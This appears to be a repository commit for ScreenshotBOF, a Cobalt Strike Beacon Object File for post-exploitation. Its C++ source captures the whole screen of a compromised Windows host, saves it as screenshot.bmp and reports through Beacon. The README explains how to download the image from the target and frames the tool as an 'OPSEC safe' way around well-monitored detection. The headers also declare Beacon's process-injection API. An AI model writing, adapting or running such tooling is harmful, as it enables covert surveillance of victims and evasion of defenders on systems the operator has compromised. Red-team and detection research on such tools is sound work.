STRLCPY/ScreenshotBOF

■ ■ ■ ■ ■ ■

.gitignore

+

/.vs

■ ■ ■ ■ ■ ■

README.md

1	+	# ScreenshotBOF
2	+
3	+	An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
4	+
5	+	## Usage
6	+	1. import the screenshotBOF.cna script into Cobalt Strike
7	+	2. use the command screenshot_bof
8	+	3. Download the screenshot from the target e.g.
9	+	```
10	+	download screenshot.bmp
11	+	```
12	+
13	+	## Notes
14	+	- no evasion is performed, which should be fine since the WinAPIs used are not malicious
15	+	- in memory downloading of screenshots is planned to be added
16	+	- the filename can be changed in the source code.
17	+
18	+	## Why did I make this?
19	+	Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command.
20	+	While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more
21	+	OPSEC safe version of the screenshot capability.

■ ■ ■ ■ ■ ■

ScreenshotBOF/ScreenshotBOF.vcxproj

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	+	<ItemGroup Label="ProjectConfigurations">
4	+	<ProjectConfiguration Include="BOF\|Win32">
5	+	<Configuration>BOF</Configuration>
6	+	<Platform>Win32</Platform>
7	+	</ProjectConfiguration>
8	+	<ProjectConfiguration Include="Debug\|Win32">
9	+	<Configuration>Debug</Configuration>
10	+	<Platform>Win32</Platform>
11	+	</ProjectConfiguration>
12	+	<ProjectConfiguration Include="Release\|Win32">
13	+	<Configuration>Release</Configuration>
14	+	<Platform>Win32</Platform>
15	+	</ProjectConfiguration>
16	+	<ProjectConfiguration Include="BOF\|x64">
17	+	<Configuration>BOF</Configuration>
18	+	<Platform>x64</Platform>
19	+	</ProjectConfiguration>
20	+	<ProjectConfiguration Include="Debug\|x64">
21	+	<Configuration>Debug</Configuration>
22	+	<Platform>x64</Platform>
23	+	</ProjectConfiguration>
24	+	<ProjectConfiguration Include="Release\|x64">
25	+	<Configuration>Release</Configuration>
26	+	<Platform>x64</Platform>
27	+	</ProjectConfiguration>
28	+	</ItemGroup>
29	+	<PropertyGroup Label="Globals">
30	+	<VCProjectVersion>16.0</VCProjectVersion>
31	+	<Keyword>Win32Proj</Keyword>
32	+	<ProjectGuid>{c04ab0f3-f7e1-4996-9cfa-d1337332ef29}</ProjectGuid>
33	+	<RootNamespace>ScreenshotBOF</RootNamespace>
34	+	<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
35	+	<ProjectName>ScreenshotBOF</ProjectName>
36	+	</PropertyGroup>
37	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
38	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'" Label="Configuration">
39	+	<ConfigurationType>Application</ConfigurationType>
40	+	<UseDebugLibraries>true</UseDebugLibraries>
41	+	<PlatformToolset>v142</PlatformToolset>
42	+	<CharacterSet>Unicode</CharacterSet>
43	+	</PropertyGroup>
44	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'" Label="Configuration">
45	+	<ConfigurationType>Application</ConfigurationType>
46	+	<UseDebugLibraries>false</UseDebugLibraries>
47	+	<PlatformToolset>v142</PlatformToolset>
48	+	<WholeProgramOptimization>true</WholeProgramOptimization>
49	+	<CharacterSet>Unicode</CharacterSet>
50	+	</PropertyGroup>
51	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'" Label="Configuration">
52	+	<ConfigurationType>Application</ConfigurationType>
53	+	<UseDebugLibraries>true</UseDebugLibraries>
54	+	<PlatformToolset>v142</PlatformToolset>
55	+	<CharacterSet>Unicode</CharacterSet>
56	+	</PropertyGroup>
57	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'" Label="Configuration">
58	+	<ConfigurationType>Application</ConfigurationType>
59	+	<UseDebugLibraries>false</UseDebugLibraries>
60	+	<PlatformToolset>v142</PlatformToolset>
61	+	<WholeProgramOptimization>true</WholeProgramOptimization>
62	+	<CharacterSet>Unicode</CharacterSet>
63	+	</PropertyGroup>
64	+	<PropertyGroup Label="Configuration" Condition="'$(Configuration)\|$(Platform)'=='BOF\|Win32'">
65	+	<PlatformToolset>v142</PlatformToolset>
66	+	<ConfigurationType>Console</ConfigurationType>
67	+	<EnableASAN />
68	+	<SpectreMitigation />
69	+	</PropertyGroup>
70	+	<PropertyGroup Label="Configuration" Condition="'$(Configuration)\|$(Platform)'=='BOF\|x64'">
71	+	<ConfigurationType>Console</ConfigurationType>
72	+	<!-- This is hack to skip the linking process for our BOF config -->
73	+	<PlatformToolset>v142</PlatformToolset>
74	+	<EnableASAN />
75	+	<SpectreMitigation />
76	+	</PropertyGroup>
77	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
78	+	<ImportGroup Label="ExtensionSettings">
79	+	</ImportGroup>
80	+	<ImportGroup Label="Shared">
81	+	</ImportGroup>
82	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
83	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
84	+	</ImportGroup>
85	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
86	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
87	+	</ImportGroup>
88	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
89	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
90	+	</ImportGroup>
91	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
92	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
93	+	</ImportGroup>
94	+	<PropertyGroup Label="UserMacros" />
95	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='BOF\|x64'">
96	+	<ExtensionsToDeleteOnClean>$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj;.cdf;.cache;.obj;.obj.enc;.ilk;.ipdb;.iobj;.resources;.tlb;.tli;.tlh;.tmp;.rsp;.pgc;.pgd;.meta;.tlog;.manifest;.res;.pch;.exp;.idb;.rep;.xdc;.pdb;_manifest.rc;.bsc;.sbr;.xml;.metagen;*.bi;$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o;$(ExtensionsToDeleteOnClean)</ExtensionsToDeleteOnClean>
97	+	<CopyLocalDeploymentContent />
98	+	<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
99	+	<IntDir>intermediary\$(Configuration)\$(Platform)\</IntDir>
100	+	<TargetName>$(ProjectName)x64</TargetName>
101	+	</PropertyGroup>
102	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='BOF\|Win32'">
103	+	<ExtensionsToDeleteOnClean>$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj;.cdf;.cache;.obj;.obj.enc;.ilk;.ipdb;.iobj;.resources;.tlb;.tli;.tlh;.tmp;.rsp;.pgc;.pgd;.meta;.tlog;.manifest;.res;.pch;.exp;.idb;.rep;.xdc;.pdb;_manifest.rc;.bsc;.sbr;.xml;.metagen;*.bi;$(ExtensionsToDeleteOnClean)</ExtensionsToDeleteOnClean>
104	+	<CopyLocalDeploymentContent />
105	+	<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
106	+	<TargetName>$(ProjectName)x32</TargetName>
107	+	<IntDir>intermediary\$(Configuration)\x86\</IntDir>
108	+	</PropertyGroup>
109	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
110	+	<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
111	+	<TargetName>$(ProjectName)64</TargetName>
112	+	</PropertyGroup>
113	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
114	+	<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
115	+	<TargetName>$(ProjectName)32</TargetName>
116	+	</PropertyGroup>
117	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
118	+	<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
119	+	<TargetName>$(ProjectName)32</TargetName>
120	+	</PropertyGroup>
121	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
122	+	<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
123	+	<TargetName>$(ProjectName)64</TargetName>
124	+	</PropertyGroup>
125	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
126	+	<ClCompile>
127	+	<WarningLevel>EnableAllWarnings</WarningLevel>
128	+	<SDLCheck>true</SDLCheck>
129	+	<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
130	+	<ConformanceMode>false</ConformanceMode>
131	+	<AdditionalOptions>
132	+	</AdditionalOptions>
133	+	<ExternalWarningLevel>Level1</ExternalWarningLevel>
134	+	</ClCompile>
135	+	<Link>
136	+	<SubSystem>Console</SubSystem>
137	+	<GenerateDebugInformation>true</GenerateDebugInformation>
138	+	</Link>
139	+	</ItemDefinitionGroup>
140	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
141	+	<ClCompile>
142	+	<WarningLevel>Level4</WarningLevel>
143	+	<FunctionLevelLinking>true</FunctionLevelLinking>
144	+	<IntrinsicFunctions>true</IntrinsicFunctions>
145	+	<SDLCheck>true</SDLCheck>
146	+	<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
147	+	<ConformanceMode>false</ConformanceMode>
148	+	<ExternalWarningLevel>Level1</ExternalWarningLevel>
149	+	<AdditionalOptions>
150	+	</AdditionalOptions>
151	+	</ClCompile>
152	+	<Link>
153	+	<SubSystem>Console</SubSystem>
154	+	<EnableCOMDATFolding>true</EnableCOMDATFolding>
155	+	<OptimizeReferences>true</OptimizeReferences>
156	+	<GenerateDebugInformation>true</GenerateDebugInformation>
157	+	</Link>
158	+	</ItemDefinitionGroup>
159	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
160	+	<ClCompile>
161	+	<WarningLevel>EnableAllWarnings</WarningLevel>
162	+	<SDLCheck>true</SDLCheck>
163	+	<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
164	+	<ConformanceMode>false</ConformanceMode>
165	+	<IntrinsicFunctions>true</IntrinsicFunctions>
166	+	<ExternalWarningLevel>Level1</ExternalWarningLevel>
167	+	</ClCompile>
168	+	<Link>
169	+	<SubSystem>Console</SubSystem>
170	+	<GenerateDebugInformation>true</GenerateDebugInformation>
171	+	</Link>
172	+	</ItemDefinitionGroup>
173	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
174	+	<ClCompile>
175	+	<WarningLevel>Level4</WarningLevel>
176	+	<FunctionLevelLinking>true</FunctionLevelLinking>
177	+	<IntrinsicFunctions>true</IntrinsicFunctions>
178	+	<SDLCheck>true</SDLCheck>
179	+	<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
180	+	<ConformanceMode>false</ConformanceMode>
181	+	<ExternalWarningLevel>Level1</ExternalWarningLevel>
182	+	</ClCompile>
183	+	<Link>
184	+	<SubSystem>Console</SubSystem>
185	+	<EnableCOMDATFolding>true</EnableCOMDATFolding>
186	+	<OptimizeReferences>true</OptimizeReferences>
187	+	<GenerateDebugInformation>true</GenerateDebugInformation>
188	+	</Link>
189	+	</ItemDefinitionGroup>
190	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='BOF\|x64'">
191	+	<ClCompile>
192	+	<AdditionalOptions>/c /Fo"intermediary\BOF\x64\source"</AdditionalOptions>
193	+	<WarningLevel>
194	+	</WarningLevel>
195	+	<DebugInformationFormat>None</DebugInformationFormat>
196	+	<BufferSecurityCheck>false</BufferSecurityCheck>
197	+	<PreprocessorDefinitions>BOF;%(PreprocessorDefinitions)</PreprocessorDefinitions>
198	+	<MinimalRebuild />
199	+	<ExceptionHandling />
200	+	<RuntimeLibrary />
201	+	<FloatingPointModel />
202	+	<TreatWChar_tAsBuiltInType />
203	+	<ForceConformanceInForLoopScope />
204	+	<RemoveUnreferencedCodeData />
205	+	<ModuleOutputFile />
206	+	<SuppressStartupBanner />
207	+	<CallingConvention />
208	+	<AssemblerOutput />
209	+	<AssemblerListingLocation />
210	+	<UseFullPaths />
211	+	<ErrorReporting />
212	+	<PrecompiledHeaderOutputFile />
213	+	<DiagnosticsFormat />
214	+	<Optimization>
215	+	</Optimization>
216	+	<ProgramDataBaseFileName />
217	+	<TreatWarningAsError />
218	+	<XMLDocumentationFileName />
219	+	<FavorSizeOrSpeed>
220	+	</FavorSizeOrSpeed>
221	+	<ExternalWarningLevel>Level1</ExternalWarningLevel>
222	+	</ClCompile>
223	+	<PostBuildEvent>
224	+	<Command>xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\$(Platform)\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o*";
225	+	powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj' }"</Command>
226	+	</PostBuildEvent>
227	+	</ItemDefinitionGroup>
228	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='BOF\|Win32'">
229	+	<ClCompile>
230	+	<AdditionalOptions>/c /Fo"intermediary\BOF\x86\source"</AdditionalOptions>
231	+	<WarningLevel>
232	+	</WarningLevel>
233	+	<DebugInformationFormat>None</DebugInformationFormat>
234	+	<BufferSecurityCheck>false</BufferSecurityCheck>
235	+	<PreprocessorDefinitions>BOF;%(PreprocessorDefinitions)</PreprocessorDefinitions>
236	+	<MinimalRebuild />
237	+	<ExceptionHandling />
238	+	<RuntimeLibrary />
239	+	<FloatingPointModel />
240	+	<TreatWChar_tAsBuiltInType />
241	+	<ForceConformanceInForLoopScope />
242	+	<RemoveUnreferencedCodeData />
243	+	<ModuleOutputFile />
244	+	<SuppressStartupBanner />
245	+	<CallingConvention />
246	+	<AssemblerOutput />
247	+	<AssemblerListingLocation />
248	+	<UseFullPaths />
249	+	<ErrorReporting />
250	+	<PrecompiledHeaderOutputFile />
251	+	<DiagnosticsFormat />
252	+	<Optimization />
253	+	<ProgramDataBaseFileName />
254	+	<TreatWarningAsError />
255	+	<XMLDocumentationFileName />
256	+	<ExternalWarningLevel>Level1</ExternalWarningLevel>
257	+	</ClCompile>
258	+	<PostBuildEvent>
259	+	<Command>xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\x86\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.o*";
260	+	powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj' }"
261	+	</Command>
262	+	</PostBuildEvent>
263	+	</ItemDefinitionGroup>
264	+	<ItemGroup>
265	+	<ClCompile Include="Source.cpp" />
266	+	</ItemGroup>
267	+	<ItemGroup>
268	+	<ClInclude Include="beacon.h" />
269	+	<ClInclude Include="bofdefs.h" />
270	+	</ItemGroup>
271	+	<ItemGroup>
272	+	<Text Include="resources\strip_bof.ps1" Visible="false" />
273	+	</ItemGroup>
274	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
275	+	<ImportGroup Label="ExtensionTargets">
276	+	</ImportGroup>
277	+	</Project>

■ ■ ■ ■ ■ ■

ScreenshotBOF/ScreenshotBOF.vcxproj.filters

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	+	<ItemGroup>
4	+	<Filter Include="Header Files">
5	+	<UniqueIdentifier>{f23d5754-25e5-46a9-b783-8685f48d2291}</UniqueIdentifier>
6	+	</Filter>
7	+	<Filter Include="Source Files">
8	+	<UniqueIdentifier>{72263c50-a87a-4d99-9746-3def65c61180}</UniqueIdentifier>
9	+	</Filter>
10	+	<Filter Include="Resources">
11	+	<UniqueIdentifier>{999efb6a-e35d-49fb-bf81-1ebab5077dd0}</UniqueIdentifier>
12	+	</Filter>
13	+	</ItemGroup>
14	+	<ItemGroup>
15	+	<ClCompile Include="Source.cpp">
16	+	<Filter>Source Files</Filter>
17	+	</ClCompile>
18	+	</ItemGroup>
19	+	<ItemGroup>
20	+	<ClInclude Include="beacon.h">
21	+	<Filter>Header Files</Filter>
22	+	</ClInclude>
23	+	<ClInclude Include="bofdefs.h">
24	+	<Filter>Header Files</Filter>
25	+	</ClInclude>
26	+	</ItemGroup>
27	+	<ItemGroup>
28	+	<Text Include="resources\strip_bof.ps1">
29	+	<Filter>Resources</Filter>
30	+	</Text>
31	+	</ItemGroup>
32	+	</Project>

■ ■ ■ ■ ■ ■

ScreenshotBOF/ScreenshotBOF.vcxproj.user

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	+	<PropertyGroup />
4	+	</Project>

■ ■ ■ ■ ■ ■

ScreenshotBOF/Source.cpp

1	+	#include <windows.h>
2	+	#include <stdio.h>
3	+	#include "bofdefs.h"
4	+	#pragma comment(lib, "User32.lib")
5	+	#pragma comment(lib, "Gdi32.lib")
6	+
7	+
8	+
9	+	#pragma region error_handling
10	+	#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
11	+	BOOL _print_error(char* func, int line, char* msg, HRESULT hr) {
12	+	#ifdef BOF
13	+	BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, hr);
14	+	#else
15	+	printf("[-] (%s at %d): %s 0x%08lx", func, line, msg, hr);
16	+	#endif // BOF
17	+
18	+	return FALSE;
19	+	}
20	+	#pragma endregion
21	+
22	+
23	+	BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
24	+	{
25	+	HDC hDC;
26	+	int iBits;
27	+	WORD wBitCount;
28	+	DWORD dwPaletteSize = 0, dwBmBitsSize = 0, dwDIBSize = 0, dwWritten = 0;
29	+	BITMAP Bitmap0;
30	+	BITMAPFILEHEADER bmfHdr;
31	+	BITMAPINFOHEADER bi;
32	+	LPBITMAPINFOHEADER lpbi;
33	+	HANDLE fh, hDib, hPal, hOldPal2 = NULL;
34	+	hDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL);
35	+	iBits = GetDeviceCaps(hDC, BITSPIXEL) * GetDeviceCaps(hDC, PLANES);
36	+	DeleteDC(hDC);
37	+	if (iBits <= 1)
38	+	wBitCount = 1;
39	+	else if (iBits <= 4)
40	+	wBitCount = 4;
41	+	else if (iBits <= 8)
42	+	wBitCount = 8;
43	+	else
44	+	wBitCount = 24;
45	+	GetObject(hBitmap, sizeof(Bitmap0), (LPSTR)&Bitmap0);
46	+	bi.biSize = sizeof(BITMAPINFOHEADER);
47	+	bi.biWidth = Bitmap0.bmWidth;
48	+	bi.biHeight = -Bitmap0.bmHeight;
49	+	bi.biPlanes = 1;
50	+	bi.biBitCount = wBitCount;
51	+	bi.biCompression = BI_RGB;
52	+	bi.biSizeImage = 0;
53	+	bi.biXPelsPerMeter = 0;
54	+	bi.biYPelsPerMeter = 0;
55	+	bi.biClrImportant = 0;
56	+	bi.biClrUsed = 256;
57	+	dwBmBitsSize = ((Bitmap0.bmWidth * wBitCount + 31) & ~31) / 8
58	+	* Bitmap0.bmHeight;
59	+	hDib = GlobalAlloc(GHND, dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER));
60	+	lpbi = (LPBITMAPINFOHEADER)GlobalLock(hDib);
61	+	*lpbi = bi;
62	+
63	+	hPal = GetStockObject(DEFAULT_PALETTE);
64	+	if (hPal)
65	+	{
66	+	hDC = GetDC(NULL);
67	+	hOldPal2 = SelectPalette(hDC, (HPALETTE)hPal, FALSE);
68	+	RealizePalette(hDC);
69	+	}
70	+
71	+
72	+	GetDIBits(hDC, hBitmap, 0, (UINT)Bitmap0.bmHeight, (LPSTR)lpbi + sizeof(BITMAPINFOHEADER)
73	+	+ dwPaletteSize, (BITMAPINFO*)lpbi, DIB_RGB_COLORS);
74	+
75	+	if (hOldPal2)
76	+	{
77	+	SelectPalette(hDC, (HPALETTE)hOldPal2, TRUE);
78	+	RealizePalette(hDC);
79	+	ReleaseDC(NULL, hDC);
80	+	}
81	+
82	+	fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
83	+	FILE_ATTRIBUTE_NORMAL \| FILE_FLAG_SEQUENTIAL_SCAN, NULL);
84	+
85	+	if (fh == INVALID_HANDLE_VALUE)
86	+	return FALSE;
87	+
88	+	bmfHdr.bfType = 0x4D42; // "BM"
89	+	dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize;
90	+	bmfHdr.bfSize = dwDIBSize;
91	+	bmfHdr.bfReserved1 = 0;
92	+	bmfHdr.bfReserved2 = 0;
93	+	bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize;
94	+
95	+	WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL);
96	+
97	+	WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL);
98	+	GlobalUnlock(hDib);
99	+	GlobalFree(hDib);
100	+	CloseHandle(fh);
101	+	return TRUE;
102	+	}
103	+
104	+	#ifdef BOF
105	+	void go(char* buff, int len) {
106	+	BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk");
107	+	int x1, y1, x2, y2, w, h;
108	+	// get screen dimensions
109	+	x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
110	+	y1 = GetSystemMetrics(SM_YVIRTUALSCREEN);
111	+	x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN);
112	+	y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN);
113	+	w = x2 - x1;
114	+	h = y2 - y1;
115	+
116	+	// copy screen to bitmap
117	+	HDC hScreen = GetDC(NULL);
118	+	HDC hDC = CreateCompatibleDC(hScreen);
119	+	HBITMAP hBitmap = CreateCompatibleBitmap(hScreen, w, h);
120	+	HGDIOBJ old_obj = SelectObject(hDC, hBitmap);
121	+	BOOL bRet = BitBlt(hDC, 0, 0, w, h, hScreen, x1, y1, SRCCOPY);
122	+
123	+	//I was going to pull from the clipboard but then realized it
124	+	//was more trouble than it was worth, so I just saved it to a file. ~ CodeX
125	+
126	+	// save bitmap to clipboard
127	+	OpenClipboard(NULL);
128	+	EmptyClipboard();
129	+	SetClipboardData(CF_BITMAP, hBitmap);
130	+	CloseClipboard();
131	+
132	+	BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap...");
133	+	LPCSTR filename = "screenshot.bmp";
134	+	SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename);
135	+
136	+	BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp");
137	+	// clean up
138	+	SelectObject(hDC, old_obj);
139	+	DeleteDC(hDC);
140	+	ReleaseDC(NULL, hScreen);
141	+	DeleteObject(hBitmap);
142	+	}
143	+
144	+
145	+	#else
146	+
147	+	void main(int argc, char* argv[]) {
148	+
149	+	}
150	+
151	+	#endif

■ ■ ■ ■ ■ ■

ScreenshotBOF/beacon.h

1	+	#pragma once
2	+
3	+	/*
4	+	* Beacon Object Files (BOF)
5	+	* -------------------------
6	+	* A Beacon Object File is a light-weight post exploitation tool that runs
7	+	* with Beacon's inline-execute command.
8	+	*
9	+	* Cobalt Strike 4.1.
10	+	*/
11	+
12	+	/* data API */
13	+	typedef struct {
14	+	char * original; /* the original buffer [so we can free it] */
15	+	char * buffer; /* current pointer into our buffer */
16	+	int length; /* remaining length of data */
17	+	int size; /* total size of this buffer */
18	+	} datap;
19	+
20	+	DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size);
21	+	DECLSPEC_IMPORT int BeaconDataInt(datap * parser);
22	+	DECLSPEC_IMPORT short BeaconDataShort(datap * parser);
23	+	DECLSPEC_IMPORT int BeaconDataLength(datap * parser);
24	+	DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size);
25	+
26	+	/* format API */
27	+	typedef struct {
28	+	char * original; /* the original buffer [so we can free it] */
29	+	char * buffer; /* current pointer into our buffer */
30	+	int length; /* remaining length of data */
31	+	int size; /* total size of this buffer */
32	+	} formatp;
33	+
34	+	DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz);
35	+	DECLSPEC_IMPORT void BeaconFormatReset(formatp * format);
36	+	DECLSPEC_IMPORT void BeaconFormatFree(formatp * format);
37	+	DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len);
38	+	DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...);
39	+	DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size);
40	+	DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value);
41	+
42	+	/* Output Functions */
43	+	#define CALLBACK_OUTPUT 0x0
44	+	#define CALLBACK_OUTPUT_OEM 0x1e
45	+	#define CALLBACK_ERROR 0x0d
46	+	#define CALLBACK_OUTPUT_UTF8 0x20
47	+
48	+	DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...);
49	+	DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len);
50	+
51	+	/* Token Functions */
52	+	DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token);
53	+	DECLSPEC_IMPORT void BeaconRevertToken();
54	+	DECLSPEC_IMPORT BOOL BeaconIsAdmin();
55	+
56	+	/* Spawn+Inject Functions */
57	+	DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
58	+	DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
59	+	DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
60	+	DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
61	+
62	+	/* Utility Functions */
63	+	DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max);
64	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/bofdefs.h

1	+	#pragma once
2	+	/* some code and/or ideas are from trustedsec SA Github repo -- thankyou trustedsec! */
3	+	#include <windows.h>
4	+
5	+
6	+	#ifdef BOF
7	+
8	+	#ifdef __cplusplus
9	+	extern "C" {
10	+	#endif
11	+
12	+	#include "beacon.h"
13	+
14	+	void go(char* buff, int len);
15	+
16	+	/* resolve some extra funcs for the screenshot */
17	+
18	+	DECLSPEC_IMPORT DWORD WINAPI User32$MessageBoxA(HWND, LPCTSTR, LPCTSTR, UINT);
19	+	#define MessageBoxCustom User32$MessageBoxA
20	+
21	+	DECLSPEC_IMPORT int WINAPI User32$GetSystemMetrics(int nIndex);
22	+	#define GetSystemMetrics User32$GetSystemMetrics
23	+
24	+	DECLSPEC_IMPORT HDC WINAPI User32$GetDC(HWND hWnd);
25	+	#define GetDC User32$GetDC
26	+
27	+	DECLSPEC_IMPORT HDC WINAPI GDI32$CreateCompatibleDC(HDC hdc);
28	+	#define CreateCompatibleDC GDI32$CreateCompatibleDC
29	+
30	+	DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int cx, int cy);
31	+	#define CreateCompatibleBitmap GDI32$CreateCompatibleBitmap
32	+
33	+	DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ h);
34	+	#define SelectObject GDI32$SelectObject
35	+
36	+	DECLSPEC_IMPORT BOOL WINAPI GDI32$BitBlt(HDC hdc,
37	+	int x,
38	+	int y,
39	+	int cx,
40	+	int cy,
41	+	HDC hdcSrc,
42	+	int x1,
43	+	int y1,
44	+	DWORD rop);
45	+	#define BitBlt GDI32$BitBlt
46	+
47	+	DECLSPEC_IMPORT BOOL WINAPI User32$OpenClipboard(HWND hWndNewOwner);
48	+	#define OpenClipboard User32$OpenClipboard
49	+
50	+	DECLSPEC_IMPORT BOOL WINAPI User32$EmptyClipboard();
51	+	#define EmptyClipboard User32$EmptyClipboard
52	+
53	+	DECLSPEC_IMPORT BOOL WINAPI User32$SetClipboardData(UINT uFormat, HANDLE hMem);
54	+	#define SetClipboardData User32$SetClipboardData
55	+
56	+	DECLSPEC_IMPORT BOOL WINAPI User32$CloseClipboard();
57	+	#define CloseClipboard User32$CloseClipboard
58	+
